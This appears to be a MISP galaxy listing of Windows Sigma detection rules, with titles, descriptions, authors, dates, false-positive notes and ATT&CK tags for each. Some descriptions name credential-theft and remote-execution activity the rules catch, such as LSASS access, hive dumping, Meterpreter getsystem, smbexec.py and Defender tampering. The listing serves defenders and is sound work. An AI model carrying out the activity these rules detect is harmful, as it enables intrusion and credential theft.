author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Packages or applications being legitimately used by users or administrators']
filename win_shell_core_susp_packages_installed.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution']

OpenSSH Server Listening On Socket

Detects scenarios where an attacker enables the OpenSSH server and the server starts listening on the SSH socket.

Internal MISP references

UUID 3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781 which can be used as unique global reference for OpenSSH Server Listening On Socket in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author mdecrevoisier
creation_date 2022/10/25
falsepositive ['Legitimate administrator activity']
filename win_sshd_openssh_server_listening_on_socket.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.004']
Related clusters

To see the related clusters, click here.

Standard User In High Privileged Group

Detects logins of standard users who are members of highly privileged groups such as the Administrator group.

Internal MISP references

UUID 7ac407cc-0f48-4328-aede-de1d2e6fef41 which can be used as unique global reference for Standard User In High Privileged Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/13
falsepositive ['Standard domain users who are part of the administrator group. These users shouldn\'t have these right. But in the case where it\'s necessary. They should be filtered out using the "TargetUserName" field']
filename win_lsa_server_normal_user_admin.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.privilege_escalation']

Sysinternals Tools AppX Versions Execution

Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths

Internal MISP references

UUID d29a20b2-be4b-4827-81f2-3d8a59eab5fc which can be used as unique global reference for Sysinternals Tools AppX Versions Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Legitimate usage of the applications from the Windows Store']
filename win_appmodel_runtime_sysinternals_tools_appx_execution.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

Microsoft Defender Tamper Protection Trigger

Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring"

Internal MISP references

UUID 49e5bc24-8b86-49f1-b743-535f332c2856 which can be used as unique global reference for Microsoft Defender Tamper Protection Trigger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj, Nasreddine Bencherchali
creation_date 2021/07/05
falsepositive ['Administrator might try to disable defender features during testing (must be investigated)']
filename win_defender_tamper_protection_trigger.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender AMSI Trigger Detected

Detects triggering of AMSI by Windows Defender.

Internal MISP references

UUID ea9bf0fa-edec-4fb8-8b78-b119f2528186 which can be used as unique global reference for Windows Defender AMSI Trigger Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2020/09/14
falsepositive ['Unlikely']
filename win_defender_malware_detected_amsi_source.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Windows Defender Real-time Protection Disabled

Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain much information on who initiated the action, you might want to reduce it to a "medium" level if it occurs too many times in your environment.

Internal MISP references

UUID b28e58e4-2a72-4fae-bdee-0fbe904db642 which can be used as unique global reference for Windows Defender Real-time Protection Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113
creation_date 2020/07/28
falsepositive ['Administrator actions (should be investigated)', 'Seen being triggered occasionally during Windows 8 Defender Updates']
filename win_defender_real_time_protection_disabled.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Malware And PUA Scanning Disabled

Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software

Internal MISP references

UUID bc275be9-0bec-4d77-8c8f-281a2df6710f which can be used as unique global reference for Windows Defender Malware And PUA Scanning Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113
creation_date 2020/07/28
falsepositive ['Unknown']
filename win_defender_malware_and_pua_scan_disabled.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Virus Scanning Feature Disabled

Detects disabling of the Windows Defender virus scanning feature

Internal MISP references

UUID 686c0b4b-9dd3-4847-9077-d6c1bbe36fcb which can be used as unique global reference for Windows Defender Virus Scanning Feature Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113
creation_date 2020/07/28
falsepositive ['Unknown']
filename win_defender_virus_scan_disabled.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Exclusions Added

Detects the setting of Windows Defender exclusions.

Internal MISP references

UUID 1321dc4e-a1fe-481d-a016-52c45f0c8b4f which can be used as unique global reference for Windows Defender Exclusions Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/07/06
falsepositive ['Administrator actions']
filename win_defender_config_change_exclusion_added.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

LSASS Access Detected via Attack Surface Reduction

Detects access to the LSASS process.

Internal MISP references

UUID a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98 which can be used as unique global reference for LSASS Access Detected via Attack Surface Reduction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2018/08/26
falsepositive ['Google Chrome GoogleUpdate.exe', 'Some Taskmgr.exe related activity']
filename win_defender_asr_lsass_access.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Windows Defender Real-Time Protection Failure/Restart

Detects issues with Windows Defender Real-Time Protection features

Internal MISP references

UUID dd80db93-6ec2-4f4c-a017-ad40da6ffe81 which can be used as unique global reference for Windows Defender Real-Time Protection Failure/Restart in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' (Update)
creation_date 2023/03/28
falsepositive ["Some crashes can occur sometimes and the event doesn't provide enough information to tune out these cases. Manual exception is required"]
filename win_defender_real_time_protection_errors.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Malware Detection History Deletion

Windows Defender logs when the history of detected infections is deleted.

Internal MISP references

UUID 2afe6582-e149-11ea-87d0-0242ac130003 which can be used as unique global reference for Windows Defender Malware Detection History Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cian Heasley
creation_date 2020/08/13
falsepositive ['Deletion of Defender malware detections history for legitimate reasons']
filename win_defender_history_delete.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Windows Defender Grace Period Expired

Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.

Internal MISP references

UUID 360a1340-398a-46b6-8d06-99b905dc69d2 which can be used as unique global reference for Windows Defender Grace Period Expired in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113
creation_date 2020/07/28
falsepositive ['Unknown']
filename win_defender_antimalware_platform_expired.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Submit Sample Feature Disabled

Detects disabling of the "Automatic Sample Submission" feature of Windows Defender.

Internal MISP references

UUID 91903aba-1088-42ee-b680-d6d94fe002b0 which can be used as unique global reference for Windows Defender Submit Sample Feature Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/06
falsepositive ['Administrator activity (must be investigated)']
filename win_defender_config_change_sample_submission_consent.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Threat Detected

Detects actions taken by Windows Defender malware detection engines

Internal MISP references

UUID 57b649ef-ff42-4fb0-8bf6-62da243a1708 which can be used as unique global reference for Windows Defender Threat Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský
creation_date 2020/07/28
falsepositive ['Unlikely']
filename win_defender_threat.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Windows Defender Configuration Changes

Detects suspicious changes to the Windows Defender configuration

Internal MISP references

UUID 801bd44f-ceed-4eb6-887c-11544633c0aa which can be used as unique global reference for Windows Defender Configuration Changes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/06
falsepositive ['Administrator activity (must be investigated)']
filename win_defender_suspicious_features_tampering.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Exploit Guard Tamper

Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications"

Internal MISP references

UUID a3ab73f1-bd46-4319-8f06-4b20d0617886 which can be used as unique global reference for Windows Defender Exploit Guard Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Unlikely']
filename win_defender_config_change_exploit_guard_tamper.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Win Defender Restored Quarantine File

Detects the restoration of files from the Defender quarantine

Internal MISP references

UUID bc92ca75-cd42-4d61-9a37-9d5aa259c88b which can be used as unique global reference for Win Defender Restored Quarantine File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/06
falsepositive ['Legitimate administrator activity restoring a file']
filename win_defender_restored_quarantine_file.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

PSExec and WMI Process Creations Block

Detects blocking of process creations originating from PSExec and WMI commands

Internal MISP references

UUID 97b9ce1e-c5ab-11ea-87d0-0242ac130003 which can be used as unique global reference for PSExec and WMI Process Creations Block in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2020/07/14
falsepositive ['Unknown']
filename win_defender_asr_psexec_wmi.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.lateral_movement', 'attack.t1047', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

BITS Transfer Job Downloading File Potential Suspicious Extension

Detects a new BITS transfer job saving local files with potentially suspicious extensions

Internal MISP references

UUID b85e5894-9b19-4d86-8c87-a2f3b81f0521 which can be used as unique global reference for BITS Transfer Job Downloading File Potential Suspicious Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/01
falsepositive ["While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives"]
filename win_bits_client_new_transfer_saving_susp_extensions.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

BITS Transfer Job With Uncommon Or Suspicious Remote TLD

Detects a suspicious download using the BITS client from an unusual FQDN. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.

Internal MISP references

UUID 6d44fb93-e7d2-475c-9d3d-54c9c1e33427 which can be used as unique global reference for BITS Transfer Job With Uncommon Or Suspicious Remote TLD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/10
falsepositive ['This rule doesn\'t exclude other known TLDs such as ".org" or ".net". It\'s recommended to apply additional filters for software and scripts that leverage the BITS service']
filename win_bits_client_new_transfer_via_uncommon_tld.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

BITS Transfer Job Download To Potential Suspicious Folder

Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location

Internal MISP references

UUID f8a56cb7-a363-44ed-a82f-5926bb44cd05 which can be used as unique global reference for BITS Transfer Job Download To Potential Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename win_bits_client_new_trasnfer_susp_local_folder.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

New BITS Job Created Via PowerShell

Detects the creation of a new BITS job by PowerShell

Internal MISP references

UUID fe3a2d49-f255-4d10-935c-bda7391108eb which can be used as unique global reference for New BITS Job Created Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/01
falsepositive ['Administrator PowerShell scripts']
filename win_bits_client_new_job_via_powershell.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

BITS Transfer Job Download From Direct IP

Detects a BITS transfer job downloading file(s) from a direct IP address.

Internal MISP references

UUID 90f138c1-f578-4ac3-8c49-eecfd847c8b7 which can be used as unique global reference for BITS Transfer Job Download From Direct IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_bits_client_new_transfer_via_ip_address.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

New BITS Job Created Via Bitsadmin

Detects the creation of a new BITS job by Bitsadmin

Internal MISP references

UUID 1ff315dc-2a3a-4b71-8dde-873818d25d39 which can be used as unique global reference for New BITS Job Created Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/01
falsepositive ['Many legitimate applications or scripts could leverage "bitsadmin". This event is best correlated with EID 16403 via the JobID field']
filename win_bits_client_new_job_via_bitsadmin.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

BITS Transfer Job Download From File Sharing Domains

Detects BITS transfer job downloading files from a file sharing domain.

Internal MISP references

UUID d635249d-86b5-4dad-a8c7-d7272b788586 which can be used as unique global reference for BITS Transfer Job Download From File Sharing Domains in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename win_bits_client_new_transfer_via_file_sharing_domains.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

Certificate Private Key Acquired

Detects when an application acquires a certificate private key

Internal MISP references

UUID e2b5163d-7deb-4566-9af3-40afea6858c3 which can be used as unique global reference for Certificate Private Key Acquired in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Zach Mathis
creation_date 2023/05/13
falsepositive ['Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed']
filename win_capi2_acquire_certificate_private_key.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1649']
Related clusters

To see the related clusters, click here.

Ngrok Usage with Remote Desktop Service

Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour

Internal MISP references

UUID 64d51a51-32a6-49f0-9f3d-17e34d640272 which can be used as unique global reference for Ngrok Usage with Remote Desktop Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/29
falsepositive ['Unknown']
filename win_terminalservices_rdp_ngrok.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Failed DNS Zone Transfer

Detects when a DNS zone transfer failed.

Internal MISP references

UUID 6d444368-6da1-43fe-b2fc-44202430480e which can be used as unique global reference for Failed DNS Zone Transfer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Zach Mathis
creation_date 2023/05/24
falsepositive ['Unlikely']
filename win_dns_server_failed_dns_zone_transfer.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1590.002']
Related clusters

To see the related clusters, click here.

DNS Server Error Failed Loading the ServerLevelPluginDLL

Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded

Internal MISP references

UUID cbe51394-cd93-4473-b555-edf0144952d9 which can be used as unique global reference for DNS Server Error Failed Loading the ServerLevelPluginDLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/08
falsepositive ['Unknown']
filename win_dns_server_susp_server_level_plugin_dll.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Windows Update Error

Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.

Internal MISP references

UUID 13cfeb75-9e33-4d04-b0f7-ab8faaa95a59 which can be used as unique global reference for Windows Update Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/04
falsepositive ['Unknown']
filename win_system_susp_system_update_error.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.resource_development', 'attack.t1584']
Related clusters

To see the related clusters, click here.

Critical Hive In Suspicious Location Access Bits Cleared

Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system-like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive that has not been recognized in the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.

Internal MISP references

UUID 39f919f3-980b-4e6f-a975-8af7e507ef2b which can be used as unique global reference for Critical Hive In Suspicious Location Access Bits Cleared in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/15
falsepositive ['Unknown']
filename win_system_susp_critical_hive_location_access_bits_cleared.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Potential RDP Exploit CVE-2019-0708

Detects a suspicious RDP protocol error that may indicate exploitation of CVE-2019-0708

Internal MISP references

UUID aaa5b30d-f418-420b-83a0-299cb6024885 which can be used as unique global reference for Potential RDP Exploit CVE-2019-0708 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Lionel PRAT, Christophe BROCAS, @atc_project (improvements)
creation_date 2019/05/24
falsepositive ['Bad connections or network interruptions']
filename win_system_rdp_potential_cve_2019_0708.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1210', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

Volume Shadow Copy Mount

Detects volume shadow copy mount via Windows event log

Internal MISP references

UUID f512acbf-e662-4903-843e-97ce4652b740 which can be used as unique global reference for Volume Shadow Copy Mount in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)
creation_date 2020/10/20
falsepositive ['Legitimate use of volume shadow copy mounts (backups maybe).']
filename win_system_volume_shadow_copy_mount.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Suspicious Usage of CVE_2021_34484 or CVE 2022_21919

During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (this event may produce many false positives) are created. Moreover, it appears the directory \Users\TEMP may be created during the exploitation. Observed on Server 2008.

Internal MISP references

UUID 52a85084-6989-40c3-8f32-091e12e17692 which can be used as unique global reference for Suspicious Usage of CVE_2021_34484 or CVE 2022_21919 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cybex
creation_date 2022/08/16
falsepositive ['Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx']
filename win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.execution']

NTFS Vulnerability Exploitation

Detects the exploitation of an NTFS vulnerability that was reported, without many details, via Twitter

Internal MISP references

UUID f14719ce-d3ab-4e25-9ce6-2899092260b0 which can be used as unique global reference for NTFS Vulnerability Exploitation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/01/11
falsepositive ['Unlikely']
filename win_system_ntfs_vuln_exploit.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.t1499.001']
Related clusters

To see the related clusters, click here.

Local Privilege Escalation Indicator TabTip

Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode

Internal MISP references

UUID bc2e25ed-b92b-4daa-b074-b502bdd1982b which can be used as unique global reference for Local Privilege Escalation Indicator TabTip in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/07
falsepositive ['Unknown']
filename win_system_lpe_indicators_tabtip.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

NTLMv1 Logon Between Client and Server

Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.

Internal MISP references

UUID e9d4ab66-a532-4ef7-a502-66a9e4a34f5d which can be used as unique global reference for NTLMv1 Logon Between Client and Server in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/04/26
falsepositive ['Environments that use NTLMv1']
filename win_system_lsasrv_ntlmv1.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.lateral_movement', 'attack.t1550.002']
Related clusters

To see the related clusters, click here.

Potential CVE-2021-42287 Exploitation Attempt

The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she is granted additional permissions and can make many changes to the object.

Internal MISP references

UUID e80a0fee-1a62-4419-b31e-0d0db6e6013a which can be used as unique global reference for Potential CVE-2021-42287 Exploitation Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/15
falsepositive ['Unknown']
filename win_system_exploit_cve_2021_42287.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

smbexec.py Service Installation

Detects the use of the smbexec.py tool by detecting a specific service installation

Internal MISP references

UUID 52a85084-6989-40c3-8f32-091e12e13f09 which can be used as unique global reference for smbexec.py Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Omer Faruk Celik
creation_date 2018/03/20
falsepositive ['Unknown']
filename win_system_hack_smbexec.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.execution', 'attack.t1021.002', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Stdin - System

Detects obfuscated PowerShell via stdin in scripts

Internal MISP references

UUID 487c7524-f892-4054-b263-8a0ace63fc25 which can be used as unique global reference for Invoke-Obfuscation Via Stdin - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_stdin_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Meterpreter or Cobalt Strike Getsystem Service Installation - System

Detects the use of the getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

Internal MISP references

UUID 843544a7-56e0-4dcc-a44f-5cc266dd97d6 which can be used as unique global reference for Meterpreter or Cobalt Strike Getsystem Service Installation - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)
creation_date 2019/10/26
falsepositive ['Unlikely']
filename win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1134.001', 'attack.t1134.002']
Related clusters

To see the related clusters, click here.

Remote Access Tool Services Have Been Installed - System

Detects service installation of various remote access tool software. Such software is often abused by threat actors to perform

Internal MISP references

UUID 1a31b18a-f00c-4061-9900-f735b96c99fc which can be used as unique global reference for Remote Access Tool Services Have Been Installed - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Connor Martin, Nasreddine Bencherchali
creation_date 2022/12/23
falsepositive ['Unknown']
filename win_system_service_install_remote_access_software.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Anydesk Remote Access Software Service Installation

Detects the installation of the AnyDesk software service, which could be an indication of AnyDesk abuse if the software isn't already in use in the environment.

Internal MISP references

UUID 530a6faa-ff3d-4022-b315-50828e77eef5 which can be used as unique global reference for Anydesk Remote Access Software Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/11
falsepositive ['Legitimate usage of the anydesk tool']
filename win_system_service_install_anydesk.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

Important Windows Service Terminated Unexpectedly

Detects important or interesting Windows services that got terminated unexpectedly.

Internal MISP references

UUID 56abae0c-6212-4b97-adc0-0b559bb950c3 which can be used as unique global reference for Important Windows Service Terminated Unexpectedly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/14
falsepositive ['Rare false positives could occur since service termination could happen due to multiple reasons']
filename win_system_service_terminated_unexpectedly.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

New PDQDeploy Service - Client Side

Detects PDQDeploy service installation on the target system. When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1

Internal MISP references

UUID b98a10af-1e1e-44a7-bab2-4cc026917648 which can be used as unique global reference for New PDQDeploy Service - Client Side in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/22
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_pdqdeploy_runner.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

RemCom Service Installation

Detects RemCom service installation and execution events

Internal MISP references

UUID 9e36ed87-4986-482e-8e3b-5c23ffff11bf which can be used as unique global reference for RemCom Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/07
falsepositive ['Unknown']
filename win_system_service_install_remcom.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

PAExec Service Installation

Detects PAExec service installation

Internal MISP references

UUID de7ce410-b3fb-4e8a-b38c-3b999e2c3420 which can be used as unique global reference for PAExec Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/26
falsepositive ['Unknown']
filename win_system_service_install_paexec.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation RUNDLL LAUNCHER - System

Detects obfuscated PowerShell via RUNDLL LAUNCHER

Internal MISP references

UUID 11b52f18-aaec-4d60-9143-5dd8cc4706b9 which can be used as unique global reference for Invoke-Obfuscation RUNDLL LAUNCHER - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_rundll_services.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Rundll32 - System

Detects obfuscated PowerShell via use of Rundll32 in scripts

Internal MISP references

UUID 641a4bfb-c017-44f7-800c-2aee0184ce9b which can be used as unique global reference for Invoke-Obfuscation Via Use Rundll32 - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
